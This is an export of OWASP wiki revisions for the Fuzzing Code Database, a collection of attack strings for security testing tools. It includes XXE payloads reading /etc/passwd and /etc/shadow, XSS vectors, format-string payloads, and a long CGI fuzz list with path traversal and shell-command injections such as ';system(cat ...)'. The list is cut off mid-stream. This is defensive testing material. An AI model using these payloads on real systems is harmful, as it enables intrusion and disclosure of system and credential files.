&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80079</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80079"/>
				<updated>2010-03-17T21:13:45Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
